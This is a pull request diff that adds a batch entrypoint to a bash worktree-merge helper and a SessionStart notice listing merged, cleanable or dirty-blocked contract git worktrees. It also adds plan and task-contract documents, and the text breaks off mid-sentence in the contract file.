### PR TITLE
feat(session-context): notice cleanable contract worktrees at SessionStart

### DIFF
--- a/assets/templates/helpers/worktree-merge-lib.sh
+++ b/assets/templates/helpers/worktree-merge-lib.sh
@@ -50,3 +50,56 @@ worktree_merge_mode() {
 
   printf 'unmerged\n'
 }
+
+# Batch entrypoint:
+#
+#   bash scripts/worktree-merge-lib.sh --target <ref> <branch>...
+#
+# Prints one `<branch>\t<mode>` line per input branch, in input order, using
+# the same `worktree_merge_mode` the two sourcing consumers call. It exists so
+# a caller that is not bash -- the SessionStart cleanable-worktree notice in
+# src/cli/hook/session-context.ts -- can consume this authority instead of
+# re-deriving the predicate, which is the two-authority defect issue #196 was.
+#
+# Batch rather than per-branch: a scan of N worktrees costs one process spawn,
+# not N.
+worktree_merge_lib_main() {
+  local target=""
+  while [[ $# -gt 0 ]]; do
+    case "$1" in
+      --target)
+        [[ $# -ge 2 ]] || { printf 'worktree-merge-lib: --target requires a ref\n' >&2; return 2; }
+        target="$2"
+        shift 2
+        ;;
+      --)
+        shift
+        break
+        ;;
+      -*)
+        printf 'worktree-merge-lib: unknown option: %s\n' "$1" >&2
+        return 2
+        ;;
+      *)
+        break
+        ;;
+    esac
+  done
+
+  [[ -n "$target" ]] || { printf 'worktree-merge-lib: --target <ref> is required\n' >&2; return 2; }
+
+  local branch
+  for branch in "$@"; do
+    [[ -n "$branch" ]] || continue
+    printf '%s\t%s\n' "$branch" "$(worktree_merge_mode "$branch" "$target")"
+  done
+}
+
+# Executed-vs-sourced guard. When this file is sourced, BASH_SOURCE[0] is this
+# path while $0 stays the sourcing script, so nothing below runs and sourcing
+# remains side-effect free -- scripts/contract-worktree.sh and
+# scripts/ship-worktrees.sh source this file for the function alone and must
+# keep observing exactly that.
+if [[ "${BASH_SOURCE[0]}" == "$0" ]]; then
+  worktree_merge_lib_main "$@"
+fi

--- a/plans/plan-20260818-0526-worktree-backlog-notice.md
+++ b/plans/plan-20260818-0526-worktree-backlog-notice.md
@@ -1,0 +1,223 @@
+# Plan: SessionStart notice for cleanable contract worktrees
+
+> **Status**: Executing
+> **Created**: 20260818-0526
+> **Slug**: worktree-backlog-notice
+> **Planning Source**: waza-think
+> **Orchestration Kind**: host-plan
+> **Source Ref**: (none)
+> **Artifact Level**: work-package
+> **Promotion Reason**: merge_boundary
+> **Verification Boundary**: SessionStart section must list squash-absorbed worktrees and stay silent when nothing is cleanable
+> **Rollback Surface**: two source files, no external state
+> **Spec**: `docs/spec.md`
+> **Research**: See `docs/researches/`
+> **Task Contract**: `tasks/contracts/20260818-0526-worktree-backlog-notice.contract.md`
+> **Task Review**: `tasks/reviews/20260818-0526-worktree-backlog-notice.review.md`
+> **Implementation Notes**: `tasks/notes/20260818-0526-worktree-backlog-notice.notes.md`
+
+## Agentic Routing
+- Selected route: planning
+- Routing reason: Captured from waza-think planning output.
+- Source ref: (none)
+- Due diligence:
+  - P1 map: See captured planning output below.
+  - P2 trace: See captured planning output below.
+  - P3 decision rationale: See captured planning output below.
+
+## Workflow Inventory
+Complete this inventory before implementation. If any line is unknown, keep the plan in Draft and fill it before projection.
+
+- Active plan: `plans/plan-20260818-0526-worktree-backlog-notice.md`
+- Sprint contract: `tasks/contracts/20260818-0526-worktree-backlog-notice.contract.md`
+- Sprint review: `tasks/reviews/20260818-0526-worktree-backlog-notice.review.md`
+- Implementation notes: `tasks/notes/20260818-0526-worktree-backlog-notice.notes.md`
+- Deferred-goal ledger: `tasks/todos.md`
+- Current checks: `.ai/harness/checks/latest.json`
+- Run snapshots: `.ai/harness/runs/`
+- Scope authority: `tasks/contracts/20260818-0526-worktree-backlog-notice.contract.md` `allowed_paths`
+- Concurrency rule: `.ai/harness/active-plan` selects the active plan for this worktree when present; `.ai/harness/active-worktree` records the owning worktree. If another worktree already owns active work, open or switch to the matching worktree instead of serializing unrelated plans.
+- Execution isolation: approved contract-level work projects through `repo-harness run plan-to-todo --plan plans/plan-20260818-0526-worktree-backlog-notice.md` and may start `repo-harness run contract-worktree start --plan plans/plan-20260818-0526-worktree-backlog-notice.md`.
+
+## Approach
+### Strategy
+Use the captured planning output below as the execution source of truth.
+
+### Trade-offs
+| Option | Pros | Cons | Decision |
+|--------|------|------|----------|
+| Captured plan | Preserves the approved Codex Plan or Waza think decision | Requires the captured text to be concrete enough to execute | Use |
+
+## Detailed Design
+### File Changes
+| File | Action | Description |
+|------|--------|-------------|
+| See captured planning output | Follow | Implement only the approved scope named below |
+
+### Code Snippets
+See captured planning output.
+
+### Data Flow
+See captured planning output.
+
+## Risk Assessment
+| Risk | Likelihood | Impact | Mitigation |
+|------|------------|--------|------------|
+| Captured plan lacks enough detail | Medium | Execution may need clarification | Stop before implementation if the captured output contradicts repo rules or lacks concrete file targets |
+
+## Task Contracts
+- Contract file: `tasks/contracts/20260818-0526-worktree-backlog-notice.contract.md`
+- Review file: `tasks/reviews/20260818-0526-worktree-backlog-notice.review.md`
+- Implementation notes file: `tasks/notes/20260818-0526-worktree-backlog-notice.notes.md`
+- Template: `.claude/templates/contract.template.md`
+- Verification command: `repo-harness run verify-contract --contract tasks/contracts/20260818-0526-worktree-backlog-notice.contract.md --strict`
+- Active plan rule: this captured plan is written to `.ai/harness/active-plan` and the owning worktree is written to `.ai/harness/active-worktree` unless --no-active is used. Do not infer active execution from the latest non-archived plan.
+
+## Handoff
+
+- Checks file: `.ai/harness/checks/latest.json`
+- Session handoff: `.ai/harness/handoff/current.md`
+
+## Promotion Gate
+
+- **Merge/PR unit**: Captured plan `plans/plan-20260818-0526-worktree-backlog-notice.md` is the proposed mergeable execution unit; revise before execute if this is only a checklist step.
+- **Rollback surface**: two source files, no external state
+- **Verification boundary**: SessionStart section must list squash-absorbed worktrees and stay silent when nothing is cleanable
+- **Review/acceptance boundary**: `tasks/reviews/20260818-0526-worktree-backlog-notice.review.md` must record pass against the captured acceptance criteria.
+- **High-risk surface**: Risks named in captured planning output; keep the plan Draft if risk ownership is not concrete.
+- **Why not checklist row**: merge_boundary
+
+## Evidence Contract
+
+- **State/progress path**: `plans/plan-20260818-0526-worktree-backlog-notice.md` task breakdown, `tasks/todos.md` deferred-goal ledger, `tasks/contracts/20260818-0526-worktree-backlog-notice.contract.md`, `tasks/reviews/20260818-0526-worktree-backlog-notice.review.md`, and `tasks/notes/20260818-0526-worktree-backlog-notice.notes.md`
+- **Verification evidence**: `.ai/harness/checks/latest.json`, `.ai/harness/runs/`, and the commands named in the captured planning output
+- **Evaluator rubric**: `tasks/reviews/20260818-0526-worktree-backlog-notice.review.md` must record a passing Waza /check style recommendation
+- **Stop condition**: all task breakdown items are complete, sprint verification passes, and the review recommends pass
+- **Rollback surface**: two source files, no external state
+
+## Captured Planning Output
+
+# SessionStart notice for cleanable contract worktrees
+
+## Why
+
+Issue #196 reported 100+ accumulated worktree directories. The three merged
+fixes (`b456121a`, `09f9d8f7`, `c121a7ed`, `9965e269`) made the cleanup path
+work; none of them tell anyone there is something to clean. The reporter's own
+framing was that an automatic suggestion asking for authorization would be the
+better experience, and that is what remains unbuilt.
+
+Deletion stays operator-executed. A worktree can hold unpushed work, removal is
+irreversible, and a timer cannot judge whether the contents matter. What can be
+automated is noticing.
+
+## The design decision that matters
+
+The merge determination has exactly one implementation as of `b456121a`:
+`worktree_merge_mode` in `scripts/worktree-merge-lib.sh`. A TypeScript section
+that re-derived `git merge-tree --write-tree` against `<target>^{tree}` would
+recreate the two-authority defect that fix just removed — the same datum decided
+in two places, drifting the moment either side changes.
+
+So the section must consume the existing authority, not reimplement it.
+
+`worktree-merge-lib.sh` is currently source-only; it exposes a function and has
+no executable entrypoint. Add one, guarded by `BASH_SOURCE`/`$0` comparison so
+sourcing behavior is unchanged:
+
+```
+bash scripts/worktree-merge-lib.sh --target <target> <branch>...
+```
+
+printing one `<branch>\t<mode>` line per input. Batch, not per-branch, so the
+whole scan costs one process spawn rather than N.
+
+Rejected alternative: parsing `ship-worktrees --cleanup-merged --dry-run`
+output. That couples a hook to a human-readable format with no stability
+contract, and `run_cmd` echoes rather than executes under `--dry-run`, so the
+mode never appears in the output at all.
+
+## Scope
+
+- `scripts/worktree-merge-lib.sh`: add a `--target <ref>` batch entrypoint
+  behind an `import.meta.main`-equivalent guard. Sourcing must remain
+  side-effect free; existing consumers (`contract-worktree.sh`,
+  `ship-worktrees.sh`) are untouched.
+- `src/cli/hook/session-context.ts`: add `worktreeBacklogSessionSection(repoRoot)`
+  and register it in `buildSessionStartSections` (line 1391) after the existing
+  `securitySentinelSessionSection`. Shape mirrors the two sibling sections
+  exactly: takes the repo root, returns a `SessionContextSection` or null.
+- Returns null when no contract worktree is cleanable, so a repo with nothing to
+  clean sees no output at all.
+- When there is something: list the cleanable slugs and the one command that
+  clears them. State plainly that nothing was deleted.
+- Scan cap 24. Measured cost is ~22ms per `merge-tree` invocation, bounding the
+  scan near 0.5s. Above the cap, state the unchecked count explicitly and point
+  at `ship-worktrees --cleanup-merged --dry-run` for the full list.
+- Tests: cleanable worktrees produce a section; zero cleanable produces null;
+  an unmerged worktree is never listed; exceeding the cap reports the remainder
+  rather than truncating silently.
+
+## Non-scope
+
+- No deletion, no prompt that performs deletion, no hook-initiated cleanup.
+- No change to `worktree_merge_mode`'s predicate, to either existing consumer,
+  or to the dirty-worktree guards.
+- No new CLI command or flag. The section points at commands that already exist.
+- Not a Stop-hook notice. Stop fires on every response; a scan costing up to
+  0.5s does not belong there.
+
+## Entity delta
+
+`+1 / -0` internal function (`worktreeBacklogSessionSection`), plus one
+executable entrypoint on an existing packaged helper. No new file, no new
+command, no new flag, no public surface.
+
+## Fragile assumption
+
+SessionStart is the right notice point. If a backlog accrues mid-session the
+notice waits for the next session start. Accepted: accumulation is chronic, not
+an event needing immediate response. If this proves wrong the fix is to add the
+same section to another event, not to redesign the scan.
+
+## Verification
+
+```
+bun test tests/session-context*.test.ts
+bun test tests/helper-scripts.test.ts
+bun test tests/contract-worktree-squash-cleanup.test.ts
+bun run check:helpers
+bun run check:type
+bun test
+```
+
+Behavioral checks:
+
+- A repo whose only contract worktree is squash-absorbed must produce a section
+  naming it.
+- A repo whose only contract worktree is genuinely unmerged must produce null.
+  This is the important one: a false positive here trains the operator to run a
+  cleanup that will refuse, and the next step after that habit forms is
+  `--discard-scaffold-only`.
+- Sourcing `worktree-merge-lib.sh` must remain side-effect free after the
+  entrypoint is added; the existing consumers' tests cover this.
+
+Falsifier: if the section lists a worktree that `contract-worktree cleanup`
+would refuse, the notice is worse than silence. Build a dirty unmerged worktree
+and assert it is absent from the section.
+
+## Rollback
+
+Two source files, no external state, no migration. Revert the commit; the
+section disappears and both helpers return to source-only behavior.
+
+## Follow-through
+
+Post to issue #196 once merged — that thread carries the original request for
+this behavior.
+
+## Annotations
+<!-- [NOTE]: prefixed inline. Claude processes all and revises. -->
+
+## Task Breakdown
+- [x] Execute captured plan: SessionStart notice for cleanable contract worktrees

--- a/scripts/worktree-merge-lib.sh
+++ b/scripts/worktree-merge-lib.sh
@@ -50,3 +50,56 @@ worktree_merge_mode() {
 
   printf 'unmerged\n'
 }
+
+# Batch entrypoint:
+#
+#   bash scripts/worktree-merge-lib.sh --target <ref> <branch>...
+#
+# Prints one `<branch>\t<mode>` line per input branch, in input order, using
+# the same `worktree_merge_mode` the two sourcing consumers call. It exists so
+# a caller that is not bash -- the SessionStart cleanable-worktree notice in
+# src/cli/hook/session-context.ts -- can consume this authority instead of
+# re-deriving the predicate, which is the two-authority defect issue #196 was.
+#
+# Batch rather than per-branch: a scan of N worktrees costs one process spawn,
+# not N.
+worktree_merge_lib_main() {
+  local target=""
+  while [[ $# -gt 0 ]]; do
+    case "$1" in
+      --target)
+        [[ $# -ge 2 ]] || { printf 'worktree-merge-lib: --target requires a ref\n' >&2; return 2; }
+        target="$2"
+        shift 2
+        ;;
+      --)
+        shift
+        break
+        ;;
+      -*)
+        printf 'worktree-merge-lib: unknown option: %s\n' "$1" >&2
+        return 2
+        ;;
+      *)
+        break
+        ;;
+    esac
+  done
+
+  [[ -n "$target" ]] || { printf 'worktree-merge-lib: --target <ref> is required\n' >&2; return 2; }
+
+  local branch
+  for branch in "$@"; do
+    [[ -n "$branch" ]] || continue
+    printf '%s\t%s\n' "$branch" "$(worktree_merge_mode "$branch" "$target")"
+  done
+}
+
+# Executed-vs-sourced guard. When this file is sourced, BASH_SOURCE[0] is this
+# path while $0 stays the sourcing script, so nothing below runs and sourcing
+# remains side-effect free -- scripts/contract-worktree.sh and
+# scripts/ship-worktrees.sh source this file for the function alone and must
+# keep observing exactly that.
+if [[ "${BASH_SOURCE[0]}" == "$0" ]]; then
+  worktree_merge_lib_main "$@"
+fi

--- a/src/cli/hook/session-context.ts
+++ b/src/cli/hook/session-context.ts
@@ -1552,7 +1552,18 @@ export function worktreeBacklogSessionContent(repoRoot: string): string | null {
     return `  - \`${slug}\` at \`${entry.path}\` (branch \`${entry.branch}\`)`;
   };
 
-  const lines = ['# Cleanable Contract Worktrees', ''];
+  // The header states what the body actually contains. A section whose every
+  // entry is blocked is not a list of cleanable worktrees, and titling it as
+  // one repeats -- at smaller scale -- the misdescription this section exists
+  // to avoid.
+  const header =
+    cleanable.length > 0
+      ? '# Cleanable Contract Worktrees'
+      : blocked.length > 0
+        ? '# Blocked Contract Worktrees'
+        : '# Contract Worktree Scan Incomplete';
+
+  const lines = [header, ''];
   // Dirty-merged first: it is the one that stops the batch, so it is the one
   // that has to be read first.
   if (blocked.length > 0) {
@@ -1566,7 +1577,11 @@ export function worktreeBacklogSessionContent(repoRoot: string): string | null {
     lines.push(...cleanable.map(describe));
     lines.push(`- Review with \`${WORKTREE_CLEANUP_DRY_RUN}\`, then run \`${WORKTREE_CLEANUP_COMMAND}\` from this worktree.`);
   } else if (blocked.length === 0) {
-    lines.push(`- None of the first ${scanned.length} contract worktree(s) are merged into \`${target}\`.`);
+    // "are cleanable", not "are merged into <target>": a merged worktree whose
+    // directory is gone was withheld above, so it is inside `scanned.length`
+    // and merged, which made the stronger claim literally false. Only
+    // reachable past the cap, since all three lists empty returns null.
+    lines.push(`- None of the first ${scanned.length} contract worktree(s) are cleanable.`);
   }
   if (unchecked > 0) {
     lines.push(

--- a/src/cli/hook/session-context.ts
+++ b/src/cli/hook/session-context.ts
@@ -1445,12 +1445,47 @@ function samePath(left: string, right: string): boolean {
   }
 }
 
+type WorktreeCleanliness = 'clean' | 'dirty' | 'unreadable';
+
+/**
+ * `worktree_status_for_cleanup`'s own probe, verbatim
+ * (`git -C <path> status --porcelain=v1 --untracked-files=all`), read once per
+ * merged candidate.
+ *
+ * This is not a second authority in the sense `worktree_merge_mode` is one.
+ * That function *decides* -- ancestry or tree-equivalence, fail-closed, a
+ * predicate that can drift when either implementation changes. This observes:
+ * git reports whether a working tree has changes, nothing is derived, and both
+ * existing consumers already read it independently (`dirty_paths_for_worktree`
+ * in ship-worktrees.sh, `worktree_status_for_cleanup` in contract-worktree.sh).
+ */
+function worktreeCleanliness(path: string): WorktreeCleanliness {
+  try {
+    const status = execFileSync('git', ['-C', path, 'status', '--porcelain=v1', '--untracked-files=all'], {
+      encoding: 'utf-8',
+      stdio: ['ignore', 'pipe', 'ignore'],
+    });
+    return status.trim().length === 0 ? 'clean' : 'dirty';
+  } catch {
+    return 'unreadable';
+  }
+}
+
 /**
  * Classifies contract worktrees through the batch entrypoint of
  * `scripts/worktree-merge-lib.sh`. That function is the single merge
  * authority as of `b456121a`; re-deriving `git merge-tree --write-tree` here
  * would put the same datum back under two authorities, which is the defect
  * issue #196 actually was. One spawn classifies the whole scan.
+ *
+ * Merged worktrees then split on cleanliness, because merged-and-dirty is not
+ * a worktree the operator should be invited to clean: `cleanup_merged` runs
+ * `guard_dirty_merged_worktree ... || exit 1` (ship-worktrees.sh:1146) BEFORE
+ * its `DRY_RUN` branch, so one dirty worktree aborts the entire batch --
+ * including the `--dry-run` this section recommends -- and every worktree
+ * after it survives. That is the accumulation dynamic of issue #196 itself, so
+ * dirty-merged worktrees are named as the blocker rather than dropped or
+ * quietly mixed into the cleanable list.
  */
 export function worktreeBacklogSessionContent(repoRoot: string): string | null {
   const libPath = join(repoRoot, WORKTREE_MERGE_LIB);
@@ -1495,27 +1530,50 @@ export function worktreeBacklogSessionContent(repoRoot: string): string | null {
       .filter((cells) => cells[1] === 'ancestor' || cells[1] === 'absorbed')
       .map((cells) => cells[0]),
   );
-  const listed = scanned.filter((entry) => merged.has(entry.branch));
-  if (listed.length === 0 && unchecked === 0) return null;
+
+  const cleanable: LinkedWorktreeEntry[] = [];
+  const blocked: LinkedWorktreeEntry[] = [];
+  for (const entry of scanned) {
+    if (!merged.has(entry.branch)) continue;
+    const cleanliness = worktreeCleanliness(entry.path);
+    if (cleanliness === 'clean') cleanable.push(entry);
+    else if (cleanliness === 'dirty') blocked.push(entry);
+    // `unreadable` is a prunable registration: the directory is gone but the
+    // worktree is still registered. `contract-worktree cleanup` dies on an
+    // unhandled `cd` into that path, and `ship-worktrees --cleanup-merged
+    // --slug` exits with "linked worktree status unavailable after repair
+    // attempt". Withheld from both lists -- `git worktree prune` is the
+    // remedy, and neither list is the place to invite it.
+  }
+  if (cleanable.length === 0 && blocked.length === 0 && unchecked === 0) return null;
+
+  const describe = (entry: LinkedWorktreeEntry): string => {
+    const slug = entry.branch.slice(prefix.length) || entry.branch;
+    return `  - \`${slug}\` at \`${entry.path}\` (branch \`${entry.branch}\`)`;
+  };
 
   const lines = ['# Cleanable Contract Worktrees', ''];
-  if (listed.length > 0) {
-    lines.push(`- ${listed.length} contract worktree(s) already merged into \`${target}\`. Nothing was deleted.`);
-    for (const entry of listed) {
-      const slug = entry.branch.slice(prefix.length) || entry.branch;
-      lines.push(`  - \`${slug}\` at \`${entry.path}\` (branch \`${entry.branch}\`)`);
-    }
-  } else {
-    lines.push(`- None of the first ${scanned.length} contract worktree(s) are merged into \`${target}\`. Nothing was deleted.`);
+  // Dirty-merged first: it is the one that stops the batch, so it is the one
+  // that has to be read first.
+  if (blocked.length > 0) {
+    lines.push(
+      `- Blocking the batch: ${blocked.length} worktree(s) merged into \`${target}\` but dirty. \`--cleanup-merged\` exits at the first of these it reaches -- \`--dry-run\` included -- so nothing after it is cleaned, which is how a backlog accumulates. Commit or extract those changes first; \`--discard-scaffold-only\` deletes them rather than resolving this.`,
+    );
+    lines.push(...blocked.map(describe));
+  }
+  if (cleanable.length > 0) {
+    lines.push(`- Cleanable now: ${cleanable.length} worktree(s) merged into \`${target}\` and clean.`);
+    lines.push(...cleanable.map(describe));
+    lines.push(`- Review with \`${WORKTREE_CLEANUP_DRY_RUN}\`, then run \`${WORKTREE_CLEANUP_COMMAND}\` from this worktree.`);
+  } else if (blocked.length === 0) {
+    lines.push(`- None of the first ${scanned.length} contract worktree(s) are merged into \`${target}\`.`);
   }
   if (unchecked > 0) {
     lines.push(
       `- Scan capped at ${WORKTREE_BACKLOG_SCAN_CAP}; ${unchecked} further worktree(s) were not checked. Run \`${WORKTREE_CLEANUP_DRY_RUN}\` for the full list.`,
     );
   }
-  lines.push(
-    `- Deletion stays yours: review with \`${WORKTREE_CLEANUP_DRY_RUN}\`, then run \`${WORKTREE_CLEANUP_COMMAND}\` from this worktree. A dirty worktree is still refused separately.`,
-  );
+  lines.push('- This notice deleted nothing. Every command above is yours to run.');
   return lines.join('\n');
 }
 

--- a/src/cli/hook/session-context.ts
+++ b/src/cli/hook/session-context.ts
@@ -1377,13 +1377,171 @@ export function sessionStartMainSection(
 }
 
 // ---------------------------------------------------------------------------
+// Cleanable contract worktree notice (issue #196)
+// ---------------------------------------------------------------------------
+//
+// The four merged fixes made contract-worktree cleanup actually reach
+// squash-merged worktrees; none of them tell anyone there is something to
+// clean, which is how 100+ worktree directories accumulated. This section only
+// notices. Deletion stays operator-executed: a worktree can hold unpushed work
+// and removal is irreversible.
+
+/**
+ * Bound on how many contract worktrees one SessionStart classifies. Each
+ * classification costs one `git merge-tree --write-tree` (~22ms measured),
+ * which holds the whole scan near half a second at this cap. Worktrees past
+ * the cap are reported as an explicit unchecked count -- never silently
+ * dropped, because a silent truncation would make the notice's own silence
+ * unreadable.
+ */
+const WORKTREE_BACKLOG_SCAN_CAP = 24;
+
+const WORKTREE_MERGE_LIB = 'scripts/worktree-merge-lib.sh';
+const WORKTREE_CLEANUP_DRY_RUN = 'repo-harness run ship-worktrees --cleanup-merged --dry-run';
+const WORKTREE_CLEANUP_COMMAND = 'repo-harness run ship-worktrees --cleanup-merged';
+
+interface LinkedWorktreeEntry {
+  readonly branch: string;
+  readonly path: string;
+}
+
+/** `list_contract_worktrees()`'s awk in ship-worktrees.sh, minus the prefix filter (applied by the caller) and keeping the first `worktree` line so the main worktree stays identifiable. */
+function listWorktreeEntries(repoRoot: string): { main: string | null; entries: LinkedWorktreeEntry[] } {
+  let output: string;
+  try {
+    output = execFileSync('git', ['worktree', 'list', '--porcelain'], {
+      cwd: repoRoot,
+      encoding: 'utf-8',
+      stdio: ['ignore', 'pipe', 'ignore'],
+    });
+  } catch {
+    return { main: null, entries: [] };
+  }
+
+  const entries: LinkedWorktreeEntry[] = [];
+  let main: string | null = null;
+  let path = '';
+  for (const line of output.split('\n')) {
+    if (line.startsWith('worktree ')) {
+      path = line.slice('worktree '.length);
+      if (main === null) main = path;
+      continue;
+    }
+    if (!line.startsWith('branch ') || !path) continue;
+    const ref = line.slice('branch '.length);
+    entries.push({
+      branch: ref.startsWith('refs/heads/') ? ref.slice('refs/heads/'.length) : ref,
+      path,
+    });
+  }
+  return { main, entries };
+}
+
+function samePath(left: string, right: string): boolean {
+  try {
+    return realpathSync(left) === realpathSync(right);
+  } catch {
+    return left === right;
+  }
+}
+
+/**
+ * Classifies contract worktrees through the batch entrypoint of
+ * `scripts/worktree-merge-lib.sh`. That function is the single merge
+ * authority as of `b456121a`; re-deriving `git merge-tree --write-tree` here
+ * would put the same datum back under two authorities, which is the defect
+ * issue #196 actually was. One spawn classifies the whole scan.
+ */
+export function worktreeBacklogSessionContent(repoRoot: string): string | null {
+  const libPath = join(repoRoot, WORKTREE_MERGE_LIB);
+  if (!existsSync(libPath)) return null;
+
+  const { main, entries } = listWorktreeEntries(repoRoot);
+  if (!main) return null;
+  // Both cleanup entrypoints refuse from a linked worktree
+  // (`is_linked_worktree` in ship-worktrees.sh, the primary-worktree check in
+  // contract-worktree.sh's cleanup). Read from inside one, this notice could
+  // only name a command that cannot run where it is read.
+  if (!samePath(main, repoRoot)) return null;
+
+  const prefix = policyGet(repoRoot, ['worktree_strategy', 'branch_prefix'], 'codex/');
+  const contractWorktrees = entries.filter(
+    (entry) => entry.branch.startsWith(prefix) && !samePath(entry.path, repoRoot),
+  );
+  if (contractWorktrees.length === 0) return null;
+
+  const scanned = contractWorktrees.slice(0, WORKTREE_BACKLOG_SCAN_CAP);
+  const unchecked = contractWorktrees.length - scanned.length;
+  const target = workflowTargetBranch(repoRoot);
+
+  let modeOutput: string;
+  try {
+    modeOutput = execFileSync('bash', [libPath, '--target', target, ...scanned.map((entry) => entry.branch)], {
+      cwd: repoRoot,
+      encoding: 'utf-8',
+      stdio: ['ignore', 'pipe', 'ignore'],
+    });
+  } catch {
+    return null;
+  }
+
+  // Enumerate the two proving modes rather than negating `unmerged`: the lib
+  // is fail-closed, and a mode this reader does not recognize must land on the
+  // silent side, not in a list the operator is invited to act on.
+  const merged = new Set(
+    modeOutput
+      .split('\n')
+      .map((line) => line.split('\t'))
+      .filter((cells) => cells[1] === 'ancestor' || cells[1] === 'absorbed')
+      .map((cells) => cells[0]),
+  );
+  const listed = scanned.filter((entry) => merged.has(entry.branch));
+  if (listed.length === 0 && unchecked === 0) return null;
+
+  const lines = ['# Cleanable Contract Worktrees', ''];
+  if (listed.length > 0) {
+    lines.push(`- ${listed.length} contract worktree(s) already merged into \`${target}\`. Nothing was deleted.`);
+    for (const entry of listed) {
+      const slug = entry.branch.slice(prefix.length) || entry.branch;
+      lines.push(`  - \`${slug}\` at \`${entry.path}\` (branch \`${entry.branch}\`)`);
+    }
+  } else {
+    lines.push(`- None of the first ${scanned.length} contract worktree(s) are merged into \`${target}\`. Nothing was deleted.`);
+  }
+  if (unchecked > 0) {
+    lines.push(
+      `- Scan capped at ${WORKTREE_BACKLOG_SCAN_CAP}; ${unchecked} further worktree(s) were not checked. Run \`${WORKTREE_CLEANUP_DRY_RUN}\` for the full list.`,
+    );
+  }
+  lines.push(
+    `- Deletion stays yours: review with \`${WORKTREE_CLEANUP_DRY_RUN}\`, then run \`${WORKTREE_CLEANUP_COMMAND}\` from this worktree. A dirty worktree is still refused separately.`,
+  );
+  return lines.join('\n');
+}
+
+/** Same shape as the two sibling sections above: repo root in, section or null out. `actionable` is true because the content names an operator action; `mandatory` stays false -- an unnoticed backlog is untidy, not unsafe. */
+export function worktreeBacklogSessionSection(repoRoot: string): SessionContextSection | null {
+  const content = worktreeBacklogSessionContent(repoRoot);
+  if (!content) return null;
+  return {
+    id: 'worktree-backlog-notice',
+    priority: 6,
+    content,
+    mandatory: false,
+    actionable: true,
+    reference: WORKTREE_CLEANUP_DRY_RUN,
+  };
+}
+
+// ---------------------------------------------------------------------------
 // Top-level composition -- feeds runtime.ts's single budgetSessionContext call
 // ---------------------------------------------------------------------------
 
 /**
  * All three retired scripts' sections, in their former script-loop order
  * (`session-start-context.sh`, `minimal-change-context.sh`,
- * `security-sentinel.sh`). `runtime.ts` prepends the unchanged
+ * `security-sentinel.sh`), followed by the cleanable-worktree notice, which
+ * was never a script. `runtime.ts` prepends the unchanged
  * `effective-state` section (still the single Effective State resolution,
  * still added before any of these) and feeds the combined array to the
  * existing `budgetSessionContext` exactly once.
@@ -1401,6 +1559,8 @@ export function buildSessionStartSections(
   if (minimalChange) sections.push(minimalChange);
   const security = securitySentinelSessionSection(collector.getRepoRoot(), env);
   if (security) sections.push(security);
+  const worktreeBacklog = worktreeBacklogSessionSection(collector.getRepoRoot());
+  if (worktreeBacklog) sections.push(worktreeBacklog);
   return sections;
 }
 

--- a/tasks/contracts/20260818-0526-worktree-backlog-notice.contract.md
+++ b/tasks/contracts/20260818-0526-worktree-backlog-notice.contract.md
@@ -1,0 +1,206 @@
+# Task Contract: worktree-backlog-notice
+
+> **Status**: Active
+> **Plan**: plans/plan-20260818-0526-worktree-backlog-notice.md
+> **Task Profile**: code-change
+> <!-- legal values: code-change | docs-only | ledger-closeout | migration | eval-only | delegated-run | bugfix (omit for legacy passthrough); see docs/reference-configs/sprint-contracts.md -->
+> **Owner**: ancienttwo
+> **Capability ID**: root
+> **Last Updated**: 2026-08-18 05:26
+> **Review File**: `tasks/reviews/20260818-0526-worktree-backlog-notice.review.md`
+> **Notes File**: `tasks/notes/20260818-0526-worktree-backlog-notice.notes.md`
+> **Exemplar**: `docs/reference-configs/contract-brief-example.md`
+
+## Why
+
+Issue #196 reported 100+ accumulated worktree directories. Four merged fixes
+made the cleanup path actually work; none of them tell anyone there is something
+to clean. The reporter's own framing was that an automatic suggestion asking for
+authorization would be the better experience, and that is the part still
+unbuilt.
+
+Deletion stays operator-executed. A worktree can hold unpushed work, removal is
+irreversible, and a scheduled job cannot judge whether the contents matter. What
+is automatable is noticing.
+
+## Goal
+
+SessionStart emits a section naming the contract worktrees that are cleanable
+and the command that clears them, stays completely silent when there are none,
+and deletes nothing.
+
+## Scope
+
+- In scope: add a `--target <ref>` batch entrypoint to
+  `scripts/worktree-merge-lib.sh` behind a `BASH_SOURCE`/`$0` guard, printing
+  one `<branch>\t<mode>` line per input branch; add
+  `worktreeBacklogSessionSection(repoRoot)` to `src/cli/hook/session-context.ts`
+  and register it in `buildSessionStartSections` (`:1391`) after
+  `securitySentinelSessionSection`; add tests for the listed, silent, unmerged,
+  and over-cap cases.
+- Out of scope: any deletion, any prompt that performs deletion, any
+  hook-initiated cleanup. The predicate inside `worktree_merge_mode`. Both
+  existing consumers (`contract-worktree.sh`, `ship-worktrees.sh`). The
+  dirty-worktree guards. Any new CLI command or flag — the section points at
+  commands that already exist. Any other hook event.
+- Taste constraints: mirror the shape of `minimalChangeSessionSection` and
+  `securitySentinelSessionSection` in the same file — takes the repo root,
+  returns a section or null. Do not introduce a new section abstraction, a
+  config knob, or a caching layer.
+
+## Authority constraint (the point of this slice)
+
+The merge determination has exactly one implementation as of `b456121a`:
+`worktree_merge_mode` in `scripts/worktree-merge-lib.sh`. **Do not re-derive it
+in TypeScript.** Running `git merge-tree --write-tree` and comparing against
+`<target>^{tree}` from `session-context.ts` would recreate the two-authority
+defect that fix removed — the same datum decided in two places, drifting the
+moment either side changes. That defect is what issue #196 actually was.
+
+Consume the shell authority through the new batch entrypoint. Batch, not
+per-branch: one process spawn for the whole scan.
+
+Also rejected, do not implement: parsing
+`ship-worktrees --cleanup-merged --dry-run` output. It couples a hook to a
+human-readable format with no stability contract, and `run_cmd` echoes rather
+than executes under `--dry-run`, so the mode never appears there at all.
+
+## Stop Conditions
+
+- Stop and hand back to the parent if the change would require editing a path outside Allowed Paths.
+- Stop if an Exit Criteria command cannot be run in this environment.
+- Stop if Goal, Scope, or Exit Criteria are internally contradictory.
+- Stop if delivering the section would require re-implementing the merge
+  determination outside `scripts/worktree-merge-lib.sh`.
+- Stop if adding the entrypoint changes what sourcing the lib does. Sourcing
+  must stay side-effect free.
+
+## Scan bound
+
+Cap the scan at 24 worktrees. Measured cost is ~22ms per `merge-tree`
+invocation, bounding the scan near 0.5s. Above the cap, state the unchecked
+count explicitly and point at `ship-worktrees --cleanup-merged --dry-run` for
+the full list. Do not truncate silently.
+
+## Falsifier
+
+If the section lists a worktree that `contract-worktree cleanup` would refuse,
+the notice is worse than silence: it trains the operator to run a cleanup that
+fails, and the habit formed after that is reaching for
